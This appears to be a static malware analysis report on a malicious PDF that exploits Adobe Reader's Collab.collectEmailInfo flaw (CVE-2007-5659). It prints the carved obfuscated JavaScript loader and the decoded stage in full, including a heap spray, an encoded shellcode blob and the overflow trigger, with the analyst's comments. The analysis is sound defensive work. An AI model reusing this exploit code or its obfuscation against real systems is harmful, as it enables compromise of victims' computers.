Malicious PDF — malware analysis report

Static analysis result for SHA-256 83ba9d5c66b21811…

MALICIOUS

PDF

8.0 KB Created: 2008-04-28 12:17:40 +03:00 First seen: 2026-05-10
MD5: 2f1f3e2f7be58b4bda70996a10aa0190 SHA-1: 6801c512fb6e9b7afc752be35bcb8c9c7774afd3 SHA-256: 83ba9d5c66b218110dfa1b4e37f8100b283473fdb1a9cc37d0f80f24d0224c6b
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF file contains embedded JavaScript that exploits CVE-2007-5659 (Collab.collectEmailInfo). The JavaScript is heavily obfuscated but appears to be designed to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness, and the exploit cluster confirms the presence of known PDF exploit techniques.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9993

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/iX/1.0/ In PDF document text
    • http://ns.adobe.com/pdf/1.3/ In PDF document text
    • http://ns.adobe.com/xap/1.0/ In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0016_000.js pdf-javascript-stream PDF /JS object 16 at offset 0x931 6899 bytes
SHA-256: 35cdeb42e41bd23004c73eee0c3acc64e6836bf0309f22e64671bcb2bea6041b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
/*
 * Obfuscation wrapper carved from /JS object 16 (the decoded stage is the second
 * artifact listed below). What this one-liner does, in order:
 *   1. Reads its own source via arguments.callee.toString(), strips every
 *      non-word character (/\W/g) and upper-cases the remainder.
 *   2. Builds a 256-entry CRC-32 table (polynomial 3988292384 = 0xEDB88320) and
 *      computes the CRC-32 of that normalised source, rendered as 8 upper-case
 *      hex digits.
 *   3. Reads the first argument (drj4wuUD5) as hex byte pairs and subtracts,
 *      cycling through them, the char codes of those 8 hex digits from each byte
 *      (wrapping at 256), rebuilding the plaintext with String.fromCharCode.
 *   4. Hands the result to eval (aliased as X6UYw2p73). If eval throws, it sets
 *      a flag and attempts `window.location = "/"` inside a swallowed try/catch.
 * The second parameter (EIxl112UO) is never used.
 * Analysis note: the key is derived from the decoder's own source text, so any
 * edit to this function (e.g. swapping the eval alias for a print while
 * inspecting) changes the CRC and yields garbage — an anti-tamper property.
 * Static indicators present here: arguments.callee + toString(), an aliased
 * eval, the 0xEDB88320 constant, parseInt(…, 16) on 2-character substrings and
 * String.fromCharCode, all inside one function.
 */
function kpoU7OeoR(drj4wuUD5, EIxl112UO){var B3TB261qG = arguments.callee;var M36Xe7f0e = 4294967296;B3TB261qG = B3TB261qG.toString();B3TB261qG = B3TB261qG;var X6UYw2p73 = eval;var K0Y856YcQ = B3TB261qG.replace(/\W/g, "");K0Y856YcQ = K0Y856YcQ.toUpperCase();var JXbVcDQ6I = new Array;for(var e2Uah253D = 0; e2Uah253D < 256; e2Uah253D++) {JXbVcDQ6I[e2Uah253D] = 0;}var u1APXrrB8 = 1;for(var e2Uah253D = 128; e2Uah253D; e2Uah253D >>= 1) {u1APXrrB8 = u1APXrrB8 >>> 1 ^ (u1APXrrB8 & 1 ? 3988292384 : 0);for(var JVjE0K8du = 0; JVjE0K8du < 256; JVjE0K8du += e2Uah253D * 2) {var Y65Hsa067 = e2Uah253D + JVjE0K8du;JXbVcDQ6I[Y65Hsa067] = JXbVcDQ6I[JVjE0K8du] ^ u1APXrrB8;if (JXbVcDQ6I[Y65Hsa067] < 0) {JXbVcDQ6I[Y65Hsa067] += M36Xe7f0e;}}}var I01r2v650 = M36Xe7f0e - 1;for(var x235o8dkj = 0; x235o8dkj < K0Y856YcQ.length; x235o8dkj++) {var oVm37V0P8 = (I01r2v650 ^ K0Y856YcQ.charCodeAt(x235o8dkj)) & 255;I01r2v650 = (I01r2v650 >>> 8) ^ JXbVcDQ6I[oVm37V0P8];}I01r2v650 = I01r2v650 ^ (M36Xe7f0e - 1);if (I01r2v650 < 0) {I01r2v650 += M36Xe7f0e;}I01r2v650 = I01r2v650.toString(16).toUpperCase();while(I01r2v650.length < 8) {I01r2v650 = "0" + I01r2v650;}var gkVQ4BN5e = new Array;for(var e2Uah253D = 0; e2Uah253D < 8; e2Uah253D++) {gkVQ4BN5e[e2Uah253D] = I01r2v650.charCodeAt(e2Uah253D);}var H14b80C2k = "";var fsv7c0rhG = 0;for(var e2Uah253D = 0; e2Uah253D < drj4wuUD5.length; e2Uah253D += 2){var Y65Hsa067 = drj4wuUD5.substr(e2Uah253D, 2);var O5A624507 = parseInt(Y65Hsa067, 16);var le48722Fb = O5A624507 - gkVQ4BN5e[fsv7c0rhG];if(le48722Fb < 0) {le48722Fb = le48722Fb + 256;}H14b80C2k += String.fromCharCode(le48722Fb);if(fsv7c0rhG + 1 == gkVQ4BN5e.length) {fsv7c0rhG = 0;} else {fsv7c0rhG++;}}var p88s7XL5j = 0;try {X6UYw2p73(H14b80C2k);} catch(e) {p88s7XL5j = 1;}try {if (p88s7XL5j) {window.location = "/";}} catch(e) {}}
kpoU7OeoR('404caeA2A757A86789856b777caf657153B09dB85578B7a694bb606A70444f413da8adAF98abaeA3a16291a4a76bBEAA789160ADA1a08Fa897a98D6D5590b6876AA89A898E60523Eae4F424aac9faea0986260adA1a08fa897a98D6FA19CB39Ba7aa62737190b6876aA89a898E6065af404C414aA1A3ae7EA7A69F96556282549fAEA18Ba99BAC896E4F424aB2444F413D4ba4AD9E81b9989a97587E55a3B19D7Db69Ca88A65B8a995b5ACb39ea5ac5c636e91B2886Eab967B9b67735e72523e404C41b39AABbaa6A162a4ad9E81b9989a97734e3fB4523E404C9eb6a39ab99dA2b058a5846A799D7db4A8695e444Faf404c41b796a96576868e8072797Abc54706268B9659A759763A568A470444F3da9a3aa61a1b1916a6b959288557465A9a1a7aba496a7aa5c5567AD71659C7D59A8726871655cba6997726866AA9A7A6C6667ADA36e687959A872697a685cBA6463726866aa98a6966367AD756a6a7559A8766D71655cBA6b68767166aa9ca79A6C67ad7496677559A8759974965Cba6794759966AA6aa6679467ad75686AA659a8A399766B5Cba9594A39966aa9Aaa9a6867ad7A9667a759a8A399A2965CBA9865A39966aa6976956967ada26B9CA659a8A69973665CBA646aA46E66AA9A77666467ad7566987759a87469a2685CBA6d98a79966aa9ca6666A67AD73669B7b59A87B6eA4675cBA6997746966AA98aa976367AD75679D7859A8A399736a5Cba9594a39966AA6c78686B67ada46A9a7759a8a399A4695cBA9765A39966aa9b7D989967ADa46c9a7b59a8776dA79a5CBA6664A49b66AA6B77686567adA2969B7859a8A399a2965Cba6B97746966aa69A6999767ADa296707A59A87768A59b5CBA9a97a79C66AA69a6999767ada296707A59a87768a59B5cBA6868746966AA707e9A6867ad73976d7859a8A39D756B5Cba9594A39a66AA6976959467adA7976e7b59A8A871A76D5Cba9598a56a66AA98A6959567ad766a98a659A8a36eA7985CBA9A66A86866aa9D7D9a9567ada26d697659a8A771a76e5CBA6d64749966AA9bab959467ad73976c7559A8776EA5665cBA97997A6C66aa9aab986567ADA26e9bab59A87669736E5Cba6666A36a66AA6DA9956c67adA29a9c7E59a8a59e79695CBA9799a66a66AA9c7E6a9667ada296987759A87468a7665CBA9598789a66aa69776d9467ADA2969Cab59a878997A6e5cBA9A94A89966AA9dA99A6c67AD766A9DA659a8a499A7985cBA6965747166aa9bab959467ADA46598a859a8A871A2975cba9A96776d66AA9D75959867AD736e9d7859a8a39D776D5CBA6694a79A66aa98a66d6367ad729a9bab59a8a89b766a5Cba9a95A36a66aa69769a9667ad7A6b9bab59A8a69d73665CBA98657A6C66aa6CAB956c67A
D73669Da859A87a99A5985cba6999a37166AA6d786d6C67ADa6979c7859a8A371716c5CBA6D6C789E66AA987a6b6467ADA396687959A8799B7a655cba9565A69d66aa6d766A9567adA26E987C59a8a79978655Cba6995766966aa997A6D6467AD75999bAB59a87469A7695CBA6C98A86C66aa6E7c956C67AD73669aa859a8A769A26B5cba9A67746966AA987e96
... (truncated)
legacy_pdfkit_stage_000.js deobfuscated-js CRC32 callee-key hex decoded JavaScript at offset 0x931 2536 bytes
SHA-256: 2eeb92b4ce3a10b37333c6cf2d1f5a6e657301fe948a7d6f4f6bddbb4c977cf1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Global array that dO34iJrp() fills with the sprayed blocks; kept global so the
// strings stay referenced (and therefore resident) while the trigger below runs.
var c3VC36Gx = new Array();

// Doubles `lliJtdgU` until its byte length (the code counts 2 bytes per
// character) reaches `YqS7fbHY`, then trims it to exactly YqS7fbHY/2 characters.
// In this sample it produces the filler placed in front of the payload blob
// in dO34iJrp(). The second parameter is a byte count, not a character count.
function Ycr4yvEO(lliJtdgU, YqS7fbHY)
{
	while (lliJtdgU.length*2<YqS7fbHY) {
		lliJtdgU += lliJtdgU;
	}

	lliJtdgU = lliJtdgU.substring(0,YqS7fbHY/2);

	return lliJtdgU;
}

// Heap-spray stage. Fills the global c3VC36Gx array with about 48 copies of
// (filler + payload blob), each sized to fill one 0x400000-byte block, so that
// memory up to 0x0c0c0c0c — the same byte pattern mWCpJpgs() uses to fill the
// overflowing `msg` argument — is covered by sprayed data.
// Detection note: a %u-encoded unescape() blob, the 0x0c0c0c0c constant and a
// loop storing a large repeated string into an array are the spray indicators
// the PDF_JS_EXPLOIT_CLUSTER heuristic above is describing.
function dO34iJrp()
{
	// Address the spray is sized to reach.
	var BSLH1DCw = 0x0c0c0c0c;
	// %u-encoded payload bytes (the report flags this as an encoded payload
	// blob; presumably shellcode — not analysed here).
	var lzL68SZG = unescape("%u00e8%u0000%u5d00%uc583%ub914%u0193%u0000%uaab0%u4530%u4500%u7549%uebf9%u3a00%u3a3a%u3a3a%u3a3a%u433a%uaa56%uaaaa%ucef5%u9a0b%uaaaa%ud2aa%u21a6%ua6ea%uda21%u07b6%uc221%u41a2%u21a3%u9eea%uea27%u21d6%u96c2%u5d21%uaec0%u42f3%uaa25%uaaaa%u5348%uc5c2%uaac4%uc2aa%ud8df%uc7c6%u55fe%u21bc%u4242%uaad3%uaaaa%u7d21%u2aed%uaa95%u50df%ufded%u2aed%uaa95%u50df%u4521%u99f5%u2b63%uae46%uaaab%u21aa%ufb76%uf9f8%uaec2%uaaab%u55aa%ua6fc%uf3f0%uf8fb%ua821%ue9f9%u912a%udfaa%u2b50%u56d1%ucf84%ucfd2%ua9df%u4129%u23a2%u6da9%uaee9%ucf84%ucfd2%ue96c%uaaa2%u20f1%uae6b%u229a%uaaef%u6a99%ufafa%ufdf9%u55fa%ubafc%u5229%udfaa%uc0ac%uf9ab%ufc55%uf0ae%u29f3%uae68%u2aeb%uaa90%u1edf%ufc55%ufba2%u21fc%u96df%ude21%ud284%u5fa9%u21fc%u8adc%u5fa9%u6399%uebe3%ua907%u996f%ua571%uba14%u7c90%ua2de%u616b%ua9a7%uea70%u5b41%ub591%u4ddf%u21f4%u8ef4%u77a9%u21cc%ue1a6%uf421%ua9b6%u2177%u21ae%u6fa9%uf401%u69f3%u5542%u5554%u2455%ua4e4%u3246%u2054%ud4a4%u4872%u99d9%u2060%u9cf1%u85b0%uc5da%ufbda%uf9ed%ud3de%uaaeb%udec2%udade%u8590%ucd85%udecf%uc5c7%udfce%ucfc6%ucbc2%ucec4%ucfc6%uc484%udecf%ud985%ucbcf%uc9d8%u84c2%ucdc9%u95c3%u9b9c%u999b%ucc9e%u9d99%u9b9a%u9a9a%u9acc%u9a9c%u989a%u9cc9%ucb9c%u9a9c%ucfcb%u9c9a%u9a9a%u9a9a%u9a9a%u9a9a%u989a%u9398%u989c%u9a9e%u9e9d%u9a9a%u999a%u9e9a%u939a%u9a9a%u9a9a%u989a%u99c9%u9d9b%uaa9a");
	// Size of one sprayed block, in bytes.
	var JYSj6v3C = 0x400000;
	// Payload size in bytes (2 bytes per character).
	var S7jicAtd = lzL68SZG.length * 2;
	// Filler size so that filler + payload + 0x38 fills one block; the 0x38 is
	// presumably allocation/string-header overhead — not verified here.
	var YqS7fbHY = JYSj6v3C - (S7jicAtd+0x38);
	// Filler seed: 0x90 bytes.
	var lliJtdgU = unescape("%u9090%u9090");

	lliJtdgU = Ycr4yvEO(lliJtdgU, YqS7fbHY);
	// Block count: (0x0c0c0c0c - 0x400000) / 0x400000 ≈ 47.2, so the loop runs 48 times.
	var J_kr2KlP = (BSLH1DCw - 0x400000)/JYSj6v3C;
	
	for (var I0U23sek=0;I0U23sek<J_kr2KlP;I0U23sek++) {
		c3VC36Gx[I0U23sek] = lliJtdgU + lzL68SZG;
	}
}

// Version gate and trigger. Reads the reader version through the Acrobat
// JavaScript API (app.viewerVersion), keeps only its digits, and proceeds only
// for versions below 8.1.2, below 7.1, or any major version below 7. The
// comparison works on single digit characters, so it is only approximate.
// On a matching version it runs the heap spray (dO34iJrp) and then calls
// Collab.collectEmailInfo with an oversized `msg` made of 0x0c0c bytes — the
// CVE-2007-5659 trigger identified in the heuristics above. The version check
// itself is a useful static indicator: benign form scripts rarely branch on
// app.viewerVersion before calling Collab.* APIs.
function mWCpJpgs()
{
	var pKWPxg6Y = app.viewerVersion.toString();
	// Keep digits only, e.g. (constructed) "8.1.1" becomes "811".
	pKWPxg6Y = pKWPxg6Y.replace(/\D/g,'');


	var cJdVWEVR = new Array(
		pKWPxg6Y.charAt(0),   // major
		pKWPxg6Y.charAt(1),   // minor
		pKWPxg6Y.charAt(2));  // patch


	if ((cJdVWEVR[0] == 8 && ((cJdVWEVR[1] == 1 && cJdVWEVR[2] < 2) || cJdVWEVR[1] < 1)) ||
	    (cJdVWEVR[0] == 7 && cJdVWEVR[1] < 1) ||
	    (cJdVWEVR[0] < 7)) {
		dO34iJrp();
		// Overflow buffer: 0x0c0c repeated until the string is at least 44952 characters.
		var Ek9ZLLcr = unescape("%u0c0c%u0c0c");
		while(Ek9ZLLcr.length < 44952) Ek9ZLLcr += Ek9ZLLcr;
		this.collabStore = Collab.collectEmailInfo({subj: "",msg: Ek9ZLLcr});
	}
}

// Top-level call: the decoded stage executes as soon as the reader runs the
// /JS stream, with no user interaction beyond opening the document.
mWCpJpgs();